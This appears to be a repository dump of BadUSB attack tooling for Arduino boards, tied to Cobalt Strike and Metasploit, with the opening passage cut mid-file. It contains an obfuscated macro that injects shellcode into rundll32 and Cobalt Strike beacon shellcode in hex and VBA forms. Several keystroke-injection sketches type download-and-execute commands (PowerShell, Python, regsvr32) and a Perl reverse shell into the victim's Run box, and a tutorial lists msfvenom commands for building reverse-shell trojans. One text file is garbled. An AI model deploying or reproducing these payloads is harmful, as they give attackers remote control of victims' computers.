_\n\"99\"&Chr(44)&\"111\"&Chr(44)&\"109\"&Chr(44)&\"0\"&Chr(44)&\"98\"&Chr(44)&\"97\"&Chr(44)&\"105\"&Chr(44)&\"100\"&Chr(44)&\"117\"&Chr(44)&\"46\"&Chr(44)&\"99\"&Chr(44)&\"111\"&Chr(44)&\"109\"&Chr(44)&\"0\"&Chr(44)&\"98\"&Chr(44)&\"97\"& _\nChr(44)&\"105\"&Chr(44)&\"100\"&Chr(44)&\"117\"&Chr(44)&\"46\"&Chr(44)&\"99\"&Chr(44)&\"111\"&Chr(44)&\"109\"&Chr(44)&\"0\"&Chr(44)&\"98\"&Chr(44)&\"97\"&Chr(44)&\"105\"&Chr(44)&\"100\"&Chr(44)&\"117\"&Chr(44)&\"46\"&Chr(44)&\"99\"& _\nChr(44)&\" _\"&Chr(10)&\"111\"&Chr(44)&\"109\"&Chr(44)&\"0\"&Chr(44)&\"98\"&Chr(44)&\"97\"&Chr(44)&\"105\"&Chr(44)&\"100\"&Chr(44)&\"117\"&Chr(44)&\"46\"&Chr(44)&\"99\"&Chr(44)&\"111\"&Chr(44)&\"109\"&Chr(44)&\"0\"&Chr(44)&\"98\"&Chr(44)& _\n\"97\"&Chr(44)&\"105\"&Chr(44)&\"100\"&Chr(44)&\"117\"&Chr(44)&\"46\"&Chr(44)&\"99\"&Chr(44)&\"111\"&Chr(44)&\"109\"&Chr(44)&\"0\"&Chr(44)&\"98\"&Chr(44)&\"97\"&Chr(44)&\"105\"&Chr(44)&\"100\"&Chr(44)&\"117\"&Chr(44)&\"46\"&Chr(44)& _\n\"99\"&Chr(44)&\"111\"&Chr(44)&\"109\"&Chr(44)&\"0\"&Chr(44)&\"98\"&Chr(44)&\"97\"&Chr(44)&\"105\"&Chr(44)&\"100\"&Chr(44)&\"117\"&Chr(44)&\"46\"&Chr(44)&\"99\"&Chr(44)&\" _\"&Chr(10)&\"111\"&Chr(44)&\"109\"&Chr(44)&\"0\"&Chr(44)&\"98\"& _\nChr(44)&\"97\"&Chr(44)&\"105\"&Chr(44)&\"100\"&Chr(44)&\"117\"&Chr(44)&\"46\"&Chr(44)&\"99\"&Chr(44)&\"111\"&Chr(44)&\"109\"&Chr(44)&\"0\"&Chr(44)&\"98\"&Chr(44)&\"97\"&Chr(44)&\"105\"&Chr(44)&\"100\"&Chr(44)&\"117\"&Chr(44)&\"46\"& _\nChr(44)&\"99\"&Chr(44)&\"111\"&Chr(44)&\"109\"&Chr(44)&\"0\"&Chr(44)&\"98\"&Chr(44)&\"97\"&Chr(44)&\"105\"&Chr(44)&\"100\"&Chr(44)&\"117\"&Chr(44)&\"46\"&Chr(44)&\"99\"&Chr(44)&\"111\"&Chr(44)&\"109\"&Chr(44)&\"0\"&Chr(44)&\"98\"&Chr(44)& _\n\"97\"&Chr(44)&\"105\"&Chr(44)&\"100\"&Chr(44)&\"117\"&Chr(44)&\"46\"&Chr(44)&\"99\"&Chr(44)&\" _\"&Chr(10)&\"111\"&Chr(44)&\"109\"&Chr(44)&\"0\"&Chr(44)&\"98\"&Chr(44)&\"97\"&Chr(44)&\"105\"&Chr(44)&\"100\"&Chr(44)&\"117\"&Chr(44)& _\n\"46\"&Chr(44)&\"99\"&Chr(44)&\"111\"&Chr(44)&\"109\"&Chr(44)&\"0\"&Chr(44)&\"98\"&Chr(44)&\"97\"&Chr(44)&\"105\"&Chr(44)&\"100\"&Chr(44)&\"117\"&Chr(44)&\"46\"&Chr(44)&\"99\"&Chr(44)&\"111\"&Chr(44)&\"109\"&Chr(44)&\"0\"&Chr(44)&\"98\"& _\nChr(44)&\"97\"&Chr(44)&\"105\"&Chr(44)&\"100\"&Chr(44)&\"117\"&Chr(44)&\"46\"&Chr(44)&\"99\"&Chr(44)&\"111\"&Chr(44)&\"109\"&Chr(44)&\"0\"&Chr(44)&\"98\"&Chr(44)&\"97\"&Chr(44)&\"105\"&Chr(44)&\"100\"&Chr(44)&\"117\"&Chr(44)&\"46\"& _\nChr(44)&\"99\"&Chr(44)&\" _\"&Chr(10)&\"111\"&Chr(44)&\"109\"&Chr(44)&\"0\"&Chr(44)&\"98\"&Chr(44)&\"97\"&Chr(44)&\"105\"&Chr(44)&\"100\"&Chr(44)&\"117\"&Chr(44)&\"46\"&Chr(44)&\"99\"&Chr(44)&\"111\"&Chr(44)&\"109\"&Chr(44)&\"0\"&Chr(44)& _\n\"98\"&Chr(44)&\"97\"&Chr(44)&\"105\"&Chr(44)&\"100\"&Chr(44)&\"117\"&Chr(44)&\"46\"&Chr(44)&\"99\"&Chr(44)&\"111\"&Chr(44)&\"109\"&Chr(44)&\"0\"&Chr(44)&\"98\"&Chr(44)&\"97\"&Chr(44)&\"0\"&Chr(44)&\"104\"&Chr(44)&Chr(45)&\"16\"&Chr(44)& _\nChr(45)&\"75\"&Chr(44)&Chr(45)&\"94\"&Chr(44)&\"86\"&Chr(44)&Chr(45)&\"1\"&Chr(44)&Chr(45)&\"43\"&Chr(44)&\"106\"&Chr(44)&\"64\"&Chr(44)&\"104\"&Chr(44)&\"0\"&Chr(44)&\"16\"&Chr(44)&\"0\"&Chr(44)&\"0\"&Chr(44)&\" _\"&Chr(10)&\"104\"& _\nChr(44)&\"0\"&Chr(44)&\"0\"&Chr(44)&\"64\"&Chr(44)&\"0\"&Chr(44)&\"87\"&Chr(44)&\"104\"&Chr(44)&\"88\"&Chr(44)&Chr(45)&\"92\"&Chr(44)&\"83\"&Chr(44)&Chr(45)&\"27\"&Chr(44)&Chr(45)&\"1\"&Chr(44)&Chr(45)&\"43\"&Chr(44)&Chr(45)& _\n\"109\"&Chr(44)&Chr(45)&\"71\"&Chr(44)&\"0\"&Chr(44)&\"0\"&Chr(44)&\"0\"&Chr(44)&\"0\"&Chr(44)&\"1\"&Chr(44)&Chr(45)&\"39\"&Chr(44)&\"81\"&Chr(44)&\"83\"&Chr(44)&Chr(45)&\"119\"&Chr(44)&Chr(45)&\"25\"&Chr(44)&\"87\"&Chr(44)&\"104\"& _\nChr(44)&\"0\"&Chr(44)&\"32\"&Chr(44)&\"0\"&Chr(44)&\"0\"&Chr(44)&\"83\"&Chr(44)&\"86\"&Chr(44)&\"104\"&Chr(44)&\"18\"&Chr(44)&Chr(45)&\"106\"&Chr(44)&Chr(45)&\"119\"&Chr(44)&Chr(45)&\"30\"&Chr(44)&Chr(45)&\"1\"&Chr(44)&Chr(45)& _\n\"43\"&Chr(44)&\" _\"&Chr(10)&Chr(45)&\"123\"&Chr(44)&Chr(45)&\"64\"&Chr(44)&\"116\"&Chr(44)&Chr(45)&\"58\"&Chr(44)&Chr(45)&\"117\"&Chr(44)&\"7\"&Chr(44)&\"1\"&Chr(44)&Chr(45)&\"61\"&Chr(44)&Chr(45)&\"123\"&Chr(44)&Chr(45)& _\n\"64\"&Chr(44)&\"117\"&Chr(44)&Chr(45)&\"27\"&Chr(44)&\"88\"&Chr(44)&Chr(45)&\"61\"&Chr(44)&Chr(45)&\"24\"&Chr(44)&Chr(45)&\"87\"&Chr(44)&Chr(45)&\"3\"&Chr(44)&Chr(45)&\"1\"&Chr(44)&Chr(45)&\"1\"&Chr(44)&\"49\"&Chr(44)&\"57\"& _\nChr(44)&\"50\"&Chr(44)&\"46\"&Chr(44)&\"49\"&Chr(44)&\"54\"&Chr(44)&\"56\"&Chr(44)&\"46\"&Chr(44)&\"49\"&Chr(44)&\"53\"&Chr(44)&\"52\"&Chr(44)&\"46\"&Chr(44)&\"49\"&Chr(44)&\"51\"&Chr(44)&\"49\"&Chr(44)&\"0\"&Chr(44)&\"0\"&Chr(44)& _\n\"0\"&Chr(44)&\"0\"&Chr(44)&\"0\"&Chr(41)&Chr(10)&\"    If L\"&\"en\"&Chr(40)&\"Environ\"&Chr(40)&Chr(34)&\"ProgramW\"&\"6432\"&Chr(34)&Chr(41)&Chr(41)&\" \"&Chr(62)&\" 0 Then\"&Chr(10)&\"        \"&\"sProc \"&Chr(61)&\" Environ\"& _\nChr(40)&Chr(34)&\"windir\"&Chr(34)&Chr(41)&\" \"&Chr(38)&\" \"&Chr(34)&Chr(92)&Chr(92)&\"SysWOW64\"&Chr(92)&Chr(92)&\"rundll32\"&Chr(46)&\"exe\"&Chr(34)&Chr(10)&\"    Else\"&Chr(10)&\"        \"&\"sProc \"&Chr(61)&\" Environ\"& _\nChr(40)&Chr(34)&\"windir\"&Chr(34)&Chr(41)&\" \"&Chr(38)&\" \"&Chr(34)&Chr(92)&Chr(92)&\"System32\"&Chr(92)&Chr(92)&\"rundll32\"&Chr(46)&\"exe\"&Chr(34)&Chr(10)&\"    End \"&\"If\"&Chr(10)&Chr(10)&\"    res \"&Chr(61)&\" RunStuf\"& _\n\"f\"&Chr(40)&\"sNull\"&Chr(44)&\" sProc\"&Chr(44)&\" ByVal 0\"&Chr(38)&Chr(44)&\" ByVal 0\"&Chr(38)&Chr(44)&\" ByVal 1\"&Chr(38)&Chr(44)&\" ByVal 4\"&Chr(38)&Chr(44)&\" ByVal 0\"&Chr(38)&Chr(44)&\" sNull\"&Chr(44)&\" sInfo\"& _\nChr(44)&\" pInfo\"&Chr(41)&Chr(10)&Chr(10)&\"    rwxp\"&\"age \"&Chr(61)&\" AllocSt\"&\"uff\"&Chr(40)&\"pInfo\"&Chr(46)&\"hProcess\"&Chr(44)&\" 0\"&Chr(44)&\" UBound\"&Chr(40)&\"myArray\"&Chr(41)&Chr(44)&\" \"&Chr(38)&\"H1000\"& _\nChr(44)&\" \"&Chr(38)&\"H40\"&Chr(41)&Chr(10)&\"    For \"&\"offset \"&Chr(61)&\" LBound\"&Chr(40)&\"myArray\"&Chr(41)&\" To UBou\"&\"nd\"&Chr(40)&\"myArray\"&Chr(41)&Chr(10)&\"        \"&\"myByte \"&Chr(61)&\" myArray\"&Chr(40)& _\n\"offset\"&Chr(41)&Chr(10)&\"        \"&\"res \"&Chr(61)&\" WriteSt\"&\"uff\"&Chr(40)&\"pInfo\"&Chr(46)&\"hProcess\"&Chr(44)&\" rwxpage\"&\" \"&Chr(43)&\" offset\"&Chr(44)&\" myByte\"&Chr(44)&\" 1\"&Chr(44)&\" ByVal 0\"&Chr(38)& _\nChr(41)&Chr(10)&\"    Next\"&\" offset\"&Chr(10)&\"    res \"&Chr(61)&\" CreateS\"&\"tuff\"&Chr(40)&\"pInfo\"&Chr(46)&\"hProcess\"&Chr(44)&\" 0\"&Chr(44)&\" 0\"&Chr(44)&\" rwxpage\"&Chr(44)&\" 0\"&Chr(44)&\" 0\"&Chr(44)&\" 0\"& _\nChr(41)&Chr(10)&\"End Sub\"&Chr(10)&\"Sub Auto\"&\"Open\"&Chr(40)&Chr(41)&Chr(10)&\"    Auto\"&\"_Open\"&Chr(10)&\"End Sub\"&Chr(10)&\"Sub Work\"&\"book_Ope\"&\"n\"&Chr(40)&Chr(41)&Chr(10)&\"    Auto\"&\"_Open\"&Chr(10)&\"End Sub\"& _\nChr(10)\nobjExcel.DisplayAlerts = False\non error resume next\nobjExcel.Run \"Auto_Open\"\nobjWorkbook.Close False\nobjExcel.Quit\n\n' Restore the registry to its old state\nif action = \"\" then\n\tWshShell.RegDelete RegPath\nelse\n\tWshShell.RegWrite RegPath, action, \"REG_DWORD\"\nend if\n\t\t]]>\n\t\t</script>\n\t</registration>\n</scriptlet>"
  },
  {
    "path": "CobaltStrike_Trojanlinkage/CobaltStrike_Payload/payload.txt",
    "content": "\\xfc\\xe8\\x89\\x00\\x00\\x00\\x60\\x89\\xe5\\x31\\xd2\\x64\\x8b\\x52\\x30\\x8b\\x52\\x0c\\x8b\\x52\\x14\\x8b\\x72\\x28\\x0f\\xb7\\x4a\\x26\\x31\\xff\\x31\\xc0\\xac\\x3c\\x61\\x7c\\x02\\x2c\\x20\\xc1\\xcf\\x0d\\x01\\xc7\\xe2\\xf0\\x52\\x57\\x8b\\x52\\x10\\x8b\\x42\\x3c\\x01\\xd0\\x8b\\x40\\x78\\x85\\xc0\\x74\\x4a\\x01\\xd0\\x50\\x8b\\x48\\x18\\x8b\\x58\\x20\\x01\\xd3\\xe3\\x3c\\x49\\x8b\\x34\\x8b\\x01\\xd6\\x31\\xff\\x31\\xc0\\xac\\xc1\\xcf\\x0d\\x01\\xc7\\x38\\xe0\\x75\\xf4\\x03\\x7d\\xf8\\x3b\\x7d\\x24\\x75\\xe2\\x58\\x8b\\x58\\x24\\x01\\xd3\\x66\\x8b\\x0c\\x4b\\x8b\\x58\\x1c\\x01\\xd3\\x8b\\x04\\x8b\\x01\\xd0\\x89\\x44\\x24\\x24\\x5b\\x5b\\x61\\x59\\x5a\\x51\\xff\\xe0\\x58\\x5f\\x5a\\x8b\\x12\\xeb\\x86\\x5d\\x68\\x6e\\x65\\x74\\x00\\x68\\x77\\x69\\x6e\\x69\\x54\\x68\\x4c\\x77\\x26\\x07\\xff\\xd5\\x31\\xff\\x57\\x57\\x57\\x57\\x57\\x68\\x3a\\x56\\x79\\xa7\\xff\\xd5\\xe9\\x84\\x00\\x00\\x00\\x5b\\x31\\xc9\\x51\\x51\\x6a\\x03\\x51\\x51\\x68\\x24\\x05\\x00\\x00\\x53\\x50\\x68\\x57\\x89\\x9f\\xc6\\xff\\xd5\\xeb\\x70\\x5b\\x31\\xd2\\x52\\x68\\x00\\x02\\x60\\x84\\x52\\x52\\x52\\x53\\x52\\x50\\x68\\xeb\\x55\\x2e\\x3b\\xff\\xd5\\x89\\xc6\\x83\\xc3\\x50\\x31\\xff\\x57\\x57\\x6a\\xff\\x53\\x56\\x68\\x2d\\x06\\x18\\x7b\\xff\\xd5\\x85\\xc0\\x0f\\x84\\xc3\\x01\\x00\\x00\\x31\\xff\\x85\\xf6\\x74\\x04\\x89\\xf9\\xeb\\x09\\x68\\xaa\\xc5\\xe2\\x5d\\xff\\xd5\\x89\\xc1\\x68\\x45\\x21\\x5e\\x31\\xff\\xd5\\x31\\xff\\x57\\x6a\\x07\\x51\\x56\\x50\\x68\\xb7\\x57\\xe0\\x0b\\xff\\xd5\\xbf\\x00\\x2f\\x00\\x00\\x39\\xc7\\x74\\xb7\\x31\\xff\\xe9\\x91\\x01\\x00\\x00\\xe9\\xc9\\x01\\x00\\x00\\xe8\\x8b\\xff\\xff\\xff\\x2f\\x70\\x44\\x42\\x66\\x00\\x62\\x61\\x69\\x64\\x75\\x2e\\x63\\x6f\\x6d\\x00\\x62\\x61\\x69\\x64\\x75\\x2e\\x63\\x6f\\x6d\\x00\\x62\\x61\\x69\\x64\\x75\\x2e\\x63\\x6f\\x6d\\x00\\x62\\x61\\x69\\x64\\x75\\x2e\\x63\\x6f\\x6d\\x00\\x62\\x61\\x69\\x64\\x75\\x2e\\x63\\x6f\\x6d\\x00\\x62\\x61\\x69\\x64\\x75\\x2e\\x63\\x6f\\x6d\\x00\\x62\\x61\\x69\\x64\\x75\\x2e\\x63\\x6f\\x6d\\x00\\x62\\x61\\x69\\x00\\x55\\x73\\x65\\x72\\x2d\\x41\\x67\\x65\\x6e\\x74\\x3a\\x20\\x4d\\x6f\\x7a\\x69\\x6c\\x6c\\x61\\x2f\\x35\\x2e\\x30\\x20\\x28\\x63\\x6f\\x6d\\x70\\x61\\x74\\x69\\x62\\x6c\\x65\\x3b\\x20\\x4d\\x53\\x49\\x45\\x20\\x31\\x30\\x2e\\x30\\x3b\\x20\\x57\\x69\\x6e\\x64\\x6f\\x77\\x73\\x20\\x4e\\x54\\x20\\x36\\x2e\\x32\\x3b\\x20\\x57\\x69\\x6e\\x36\\x34\\x3b\\x20\\x78\\x36\\x34\\x3b\\x20\\x54\\x72\\x69\\x64\\x65\\x6e\\x74\\x2f\\x36\\x2e\\x30\\x29\\x0d\\x0a\\x00\\x62\\x61\\x69\\x64\\x75\\x2e\\x63\\x6f\\x6d\\x00\\x62\\x61\\x69\\x64\\x75\\x2e\\x63\\x6f\\x6d\\x00\\x62\\x61\\x69\\x64\\x75\\x2e\\x63\\x6f\\x6d\\x00\\x62\\x61\\x69\\x64\\x75\\x2e\\x63\\x6f\\x6d\\x00\\x62\\x61\\x69\\x64\\x75\\x2e\\x63\\x6f\\x6d\\x00\\x62\\x61\\x69\\x64\\x75\\x2e\\x63\\x6f\\x6d\\x00\\x62\\x61\\x69\\x64\\x75\\x2e\\x63\\x6f\\x6d\\x00\\x62\\x61\\x69\\x64\\x75\\x2e\\x63\\x6f\\x6d\\x00\\x62\\x61\\x69\\x64\\x75\\x2e\\x63\\x6f\\x6d\\x00\\x62\\x61\\x69\\x64\\x75\\x2e\\x63\\x6f\\x6d\\x00\\x62\\x61\\x69\\x64\\x75\\x2e\\x63\\x6f\\x6d\\x00\\x62\\x61\\x69\\x64\\x75\\x2e\\x63\\x6f\\x6d\\x00\\x62\\x61\\x69\\x64\\x75\\x2e\\x63\\x6f\\x6d\\x00\\x62\\x61\\x69\\x64\\x75\\x2e\\x63\\x6f\\x6d\\x00\\x62\\x61\\x69\\x64\\x75\\x2e\\x63\\x6f\\x6d\\x00\\x62\\x61\\x69\\x64\\x75\\x2e\\x63\\x6f\\x6d\\x00\\x62\\x61\\x69\\x64\\x75\\x2e\\x63\\x6f\\x6d\\x00\\x62\\x61\\x69\\x64\\x75\\x2e\\x63\\x6f\\x6d\\x00\\x62\\x61\\x69\\x64\\x75\\x2e\\x63\\x6f\\x6d\\x00\\x62\\x61\\x69\\x64\\x75\\x2e\\x63\\x6f\\x6d\\x00\\x62\\x61\\x69\\x64\\x75\\x2e\\x63\\x6f\\x6d\\x00\\x62\\x61\\x00\\x68\\xf0\\xb5\\xa2\\x56\\xff\\xd5\\x6a\\x40\\x68\\x00\\x10\\x00\\x00\\x68\\x00\\x00\\x40\\x00\\x57\\x68\\x58\\xa4\\x53\\xe5\\xff\\xd5\\x93\\xb9\\x00\\x00\\x00\\x00\\x01\\xd9\\x51\\x53\\x89\\xe7\\x57\\x68\\x00\\x20\\x00\\x00\\x53\\x56\\x68\\x12\\x96\\x89\\xe2\\xff\\xd5\\x85\\xc0\\x74\\xc6\\x8b\\x07\\x01\\xc3\\x85\\xc0\\x75\\xe5\\x58\\xc3\\xe8\\xa9\\xfd\\xff\\xff\\x31\\x39\\x32\\x2e\\x31\\x36\\x38\\x2e\\x31\\x35\\x34\\x2e\\x31\\x33\\x31\\x00\\x00\\x00\\x00\\x00"
  },
  {
    "path": "CobaltStrike_Trojanlinkage/CobaltStrike_Payload/payload.vba",
    "content": "myArray = Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117,82,12,-117,82,20,-117,114,40,15,-73,74,38,49,-1,49,-64,-84,60,97,124,2,44,32,-63,-49, _\n13,1,-57,-30,-16,82,87,-117,82,16,-117,66,60,1,-48,-117,64,120,-123,-64,116,74,1,-48,80,-117,72,24,-117,88,32,1,-45,-29,60,73,-117,52,-117,1, _\n-42,49,-1,49,-64,-84,-63,-49,13,1,-57,56,-32,117,-12,3,125,-8,59,125,36,117,-30,88,-117,88,36,1,-45,102,-117,12,75,-117,88,28,1,-45,-117,4, _\n-117,1,-48,-119,68,36,36,91,91,97,89,90,81,-1,-32,88,95,90,-117,18,-21,-122,93,104,110,101,116,0,104,119,105,110,105,84,104,76,119,38,7,-1, _\n-43,49,-1,87,87,87,87,87,104,58,86,121,-89,-1,-43,-23,-124,0,0,0,91,49,-55,81,81,106,3,81,81,104,36,5,0,0,83,80,104,87,-119,-97, _\n-58,-1,-43,-21,112,91,49,-46,82,104,0,2,96,-124,82,82,82,83,82,80,104,-21,85,46,59,-1,-43,-119,-58,-125,-61,80,49,-1,87,87,106,-1,83,86, _\n104,45,6,24,123,-1,-43,-123,-64,15,-124,-61,1,0,0,49,-1,-123,-10,116,4,-119,-7,-21,9,104,-86,-59,-30,93,-1,-43,-119,-63,104,69,33,94,49,-1, _\n-43,49,-1,87,106,7,81,86,80,104,-73,87,-32,11,-1,-43,-65,0,47,0,0,57,-57,116,-73,49,-1,-23,-111,1,0,0,-23,-55,1,0,0,-24,-117,-1, _\n-1,-1,47,86,110,82,70,0,98,97,105,100,117,46,99,111,109,0,98,97,105,100,117,46,99,111,109,0,98,97,105,100,117,46,99,111,109,0,98,97, _\n105,100,117,46,99,111,109,0,98,97,105,100,117,46,99,111,109,0,98,97,105,100,117,46,99,111,109,0,98,97,105,100,117,46,99,111,109,0,98,97, _\n105,0,85,115,101,114,45,65,103,101,110,116,58,32,77,111,122,105,108,108,97,47,53,46,48,32,40,99,111,109,112,97,116,105,98,108,101,59,32,77, _\n83,73,69,32,49,48,46,48,59,32,87,105,110,100,111,119,115,32,78,84,32,54,46,50,59,32,87,105,110,54,52,59,32,120,54,52,59,32,84,114, _\n105,100,101,110,116,47,54,46,48,41,13,10,0,98,97,105,100,117,46,99,111,109,0,98,97,105,100,117,46,99,111,109,0,98,97,105,100,117,46,99, _\n111,109,0,98,97,105,100,117,46,99,111,109,0,98,97,105,100,117,46,99,111,109,0,98,97,105,100,117,46,99,111,109,0,98,97,105,100,117,46,99, _\n111,109,0,98,97,105,100,117,46,99,111,109,0,98,97,105,100,117,46,99,111,109,0,98,97,105,100,117,46,99,111,109,0,98,97,105,100,117,46,99, _\n111,109,0,98,97,105,100,117,46,99,111,109,0,98,97,105,100,117,46,99,111,109,0,98,97,105,100,117,46,99,111,109,0,98,97,105,100,117,46,99, _\n111,109,0,98,97,105,100,117,46,99,111,109,0,98,97,105,100,117,46,99,111,109,0,98,97,105,100,117,46,99,111,109,0,98,97,105,100,117,46,99, _\n111,109,0,98,97,105,100,117,46,99,111,109,0,98,97,105,100,117,46,99,111,109,0,98,97,0,104,-16,-75,-94,86,-1,-43,106,64,104,0,16,0,0, _\n104,0,0,64,0,87,104,88,-92,83,-27,-1,-43,-109,-71,0,0,0,0,1,-39,81,83,-119,-25,87,104,0,32,0,0,83,86,104,18,-106,-119,-30,-1,-43, _\n-123,-64,116,-58,-117,7,1,-61,-123,-64,117,-27,88,-61,-24,-87,-3,-1,-1,49,57,50,46,49,54,56,46,49,53,52,46,49,51,49,0,0,0,0,0)"
  },
  {
    "path": "CobaltStrike_Trojanlinkage/PSL_TrojanExecution (LinkageWithCS).ino",
    "content": "#include<Keyboard.h>\n\nvoid setup() {//初始化\n  Keyboard.begin();//开始键盘通讯 \n  delay(5000);//延时\n  Keyboard.press(KEY_CAPS_LOCK); //按下大写键 这里我们最好这样写 不然大多数电脑在中文输入的情况下就会出现问题\n  Keyboard.release(KEY_CAPS_LOCK); //释放大写键\n  delay(200);\n  Keyboard.press(KEY_LEFT_GUI);//win键 \n  delay(200); \n  Keyboard.press('r');//r键 \n  delay(200); \n  Keyboard.release(KEY_LEFT_GUI);\n  Keyboard.release('r');\n  Keyboard.println(\"cmd.exe\");\n  delay(200); \n  Keyboard.println(\"powershell.exe -nop -w hidden -c \\\"IEX ((new-object net.webclient).downloadstring('http://192.168.154.131:80/c'))\\\"\");  //访问Web Delivery-psl，恶意网址按照实际更改\n  delay(200); \n  Keyboard.end();//结束键盘通讯 \n}\nvoid loop()//循环\n{\n}"
  },
  {
    "path": "CobaltStrike_Trojanlinkage/PY_TrojanExecution (LinkageWithCS).ino",
    "content": "#include<Keyboard.h>\n\nvoid setup() {//初始化\n  Keyboard.begin();//开始键盘通讯 \n  delay(5000);//延时\n  Keyboard.press(KEY_CAPS_LOCK); //按下大写键 这里我们最好这样写 不然大多数电脑在中文输入的情况下就会出现问题\n  Keyboard.release(KEY_CAPS_LOCK); //释放大写键\n  delay(200);\n  Keyboard.press(KEY_LEFT_GUI);//win键 \n  delay(200); \n  Keyboard.press('r');//r键 \n  delay(200); \n  Keyboard.release(KEY_LEFT_GUI);\n  Keyboard.release('r');\n  Keyboard.println(\"cmd.exe\");\n  delay(200); \n  Keyboard.println(\"python -c \\\"import urllib2; exec urllib2.urlopen('http://192.168.154.131:80/d').read();\\\"\");  //访问Web Delivery-py，恶意网址按照实际更改\n  delay(200); \n  Keyboard.end();//结束键盘通讯 \n}\nvoid loop()//循环\n{\n}"
  },
  {
    "path": "CobaltStrike_Trojanlinkage/Pl_TrojanExecution (LinkageWithCS).ino",
    "content": "#include<Keyboard.h>\n\nvoid setup() {//初始化\n  Keyboard.begin();//开始键盘通讯 \n  delay(5000);//延时\n  Keyboard.press(KEY_CAPS_LOCK); //按下大写键 这里我们最好这样写 不然大多数电脑在中文输入的情况下就会出现问题\n  Keyboard.release(KEY_CAPS_LOCK); //释放大写键\n  delay(200);\n  Keyboard.press(KEY_LEFT_GUI);//win键 \n  delay(200); \n  Keyboard.press('r');//r键 \n  delay(200); \n  Keyboard.release(KEY_LEFT_GUI);\n  Keyboard.release('r');\n  Keyboard.println(\"cmd.exe\");\n  delay(200); \n  Keyboard.println(\"perl -MIO -e '$p=fork;exit,if($p);foreach my $key(keys %ENV){if($ENV{$key}=~/(.*)/){$ENV{$key}=$1;}}$c=new IO::Socket::INET(PeerAddr,\"IP:port\");STDIN->fdopen($c,r);$~->fdopen($c,w);while(<>){if($_=~ /(.*)/){system $1;}};\");  //访问Web Delivery-Perl，恶意网址按照实际更改\n  delay(200); \n  //Keyboard.println(\"./hacked.pl\");\n  //delay(200); \n  Keyboard.end();//结束键盘通讯 \n}\nvoid loop()//循环\n{\n}"
  },
  {
    "path": "CobaltStrike_Trojanlinkage/Regsvr32_TrojanExecution (LinkageWithCS).ino",
    "content": "#include<Keyboard.h>\n\nvoid setup() {//初始化\n  Keyboard.begin();//开始键盘通讯 \n  delay(5000);//延时\n  Keyboard.press(KEY_CAPS_LOCK); //按下大写键 这里我们最好这样写 不然大多数电脑在中文输入的情况下就会出现问题\n  Keyboard.release(KEY_CAPS_LOCK); //释放大写键\n  delay(200);\n  Keyboard.press(KEY_LEFT_GUI);//win键 \n  delay(200); \n  Keyboard.press('r');//r键 \n  delay(200); \n  Keyboard.release(KEY_LEFT_GUI);\n  Keyboard.release('r');\n  Keyboard.println(\"cmd.exe\");\n  delay(200); \n  Keyboard.println(\"regsvr32 /s /n /u /i:http://192.168.154.131:80/e scrobj.dll\");  //访问Web Delivery-regsvr32，恶意网址按照实际更改\n  delay(200); \n  Keyboard.end();//结束键盘通讯 \n}\nvoid loop()//循环\n{\n}"
  },
  {
    "path": "CodePrincipleInterpretation/ArduinoKeyCodeBase.ino",
    "content": "//基础按键\nKEY_LEFT_CTRL\nKEY_LEFT_SHIFT\nKEY_LEFT_ALT\nKEY_LEFT_GUI //win键\nKEY_RIGHT_CTRL\nKEY_RIGHT_SHIFT\nKEY_RIGHT_ALT\nKEY_RIGHT_GUI\nKEY_UP_ARROW\nKEY_DOWN_ARROW\nKEY_LEFT_ARROW\nKEY_RIGHT_ARROW\nKEY_BACKSPACE\nKEY_TAB\nKEY_RETURN//回车键\nKEY_ESC\nKEY_INSERT\nKEY_DELETE\nKEY_PAGE_UP\nKEY_PAGE_DOWN\nKEY_HOME\nKEY_END\nKEY_CAPS_LOCK\nKEY_F1\nKEY_F2\nKEY_F3\nKEY_F4\nKEY_F5\nKEY_F6\nKEY_F7\nKEY_F8\nKEY_F9\nKEY_F10\nKEY_F11\nKEY_F12\n\ndelay(5000);//延时毫秒\n\nKeyboard.begin(); //开始键盘通讯\nKeyboard.end(); //结束键盘通讯\nKeyboard.press(); //按下键盘按键 如果是非特殊按键如 数字、字母按键用单引号括起来\nKeyboard.release(); //释放键盘按键\nKeyboard.println(“”); //输入字符串使用双引号括起来\n\nMouse.begin();//鼠标事件开始\nMouse.click();//鼠标单击\nMouse.end();//鼠标事件结束\nMouse.move();//鼠标移动(x,y)\nMouse.press();//鼠标按下\nMouse.release();//鼠标松开\nMouse.isPressed();\n"
  },
  {
    "path": "CodePrincipleInterpretation/InstructionsOn_setup_loop_Methods.txt",
    "content": "ʲôsetup\n   setup BadusbڲϺ״ִеĴ\n   Badusbͨʹõľsetup\n   ֻҪд\n          void setup(){//д}\n\nʲôloop\n   loopѭڲѭ£еĴѭִУдһϰF5ѭ룬ܲϺԾͻ\n\n   ΪʲôBadusbһдsetup\nԭܼ\n   㽫дloopлᵼԼҲ޷Ĵ룬ΪһĵԾͣ\n\nôµĴ޷д룬ǿд룬ҪĻñȽϸ\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n"
  },
  {
    "path": "CodePrincipleInterpretation/MSF_TrojanMakingTutorial.txt",
    "content": "msf木马制作\n\n1、在攻击者终端操作：\nmsfvenom -p windows/meterpreter/reverse_tcp lhost=kaliIP lport=<Your Port> -f exe >/root/Desktop/evilshell.exe\n-p 参数后跟上payload（攻击载荷）\nlhost  后跟监听的IP\nlport  后跟监听的端口\n-f  后跟要生成后门文件的类型\n-o  指定输出文件及类型\n-i  混淆次数\n-e  混淆模式\n例如：exe木马：\n      msfvenom -p windows/meterpreter/reverse_tcp lhost=<Your IP> lport=<Your Port> -f exe -o virus.exe -e x86/shikata_ga_nai -i 8\n\t  \n      jsp木马：\n\t  msfvenom -p java/jsp_shell_reverse_tcp LHOST=<Your IP> LPORT=<Your Port> -f raw > virus.jsp\n\t  \n\t  #Powershell木马:\n      msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=<Your IP> LPORT=<Your Port> -f psh-reflection > virus.psl\n \n      #JAVA木马:\n      msfvenom -p java/meterpreter/reverse_tcp LHOST=<Your IP> LPORT=<Your Port> -f jar -o virus.jar\n      \n      #PHP木马:\n      msfvenom -p php/meterpreter/reverse_tcp LHOST=<Your IP> LPORT=<Your Port> -f raw -o virus.php\n      \n      #ASP木马:\n      msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP> LPORT=<Your Port> -f asp > virus.asp\n      \n      #ASPX木马:\n      msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP> LPORT=<Your Port> -f aspx > virus.aspx\n      \n      